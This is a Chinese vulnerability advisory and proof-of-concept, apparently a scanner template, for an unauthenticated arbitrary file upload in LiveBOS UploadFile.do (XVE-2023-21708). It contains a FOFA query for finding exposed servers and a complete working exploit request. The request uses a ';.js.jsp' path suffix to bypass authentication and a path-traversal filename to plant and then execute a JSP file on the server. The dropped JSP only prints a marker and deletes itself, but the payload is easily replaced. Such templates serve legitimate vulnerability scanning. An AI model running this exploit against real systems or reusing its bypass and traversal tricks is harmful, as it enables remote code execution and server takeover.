漏洞描述
fofa: body="Power by LiveBOS"
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
livebos-uploadfile-do-fileupload: LiveBOS UploadFile.do 任意文件上传漏洞(XVE-2023-21708)
PoC代码[已公开]
id: livebos-uploadfile-do-fileupload
info:
name: LiveBOS UploadFile.do 任意文件上传漏洞(XVE-2023-21708)
author: Superhero
severity: critical
description: |-
fofa: body="Power by LiveBOS"
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
reference:
- https://blog.csdn.net/m0_60571842/article/details/140918297
tags: fileupload
created: 2024/08/05
set:
username: randomLowercase(6)
randbody: base64Decode("cGJveWpubnJmaXBtcGxzdWtkZWN6dWRzZWZ4bXl3ZQ==")
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /feed/UploadFile.do;.js.jsp
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition:form-data; name=\"file\"; filename=\"/../../../../{{username}}.jsp\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
<%@ page import=\"java.io.File\" %>\r\n\
<%\r\n\
out.println(\"{{randbody}}\");\r\n\
String filePath = application.getRealPath(request.getServletPath());\r\n\
new File(filePath).delete();\r\n\
%>\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /{{username}}.jsp;.js.jsp
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()